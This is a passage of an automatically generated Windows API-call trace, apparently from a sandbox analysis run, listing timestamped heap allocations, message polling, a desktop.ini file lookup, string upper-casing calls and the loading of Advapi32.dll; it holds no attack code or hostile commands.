lpsz="SSA2100602512") returned 0xd [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.612] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.614] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0209.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.615] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9e2078 [0209.616] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.617] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.617] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.618] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0209.618] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.618] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.618] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.618] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.618] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.618] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.619] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.619] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.619] 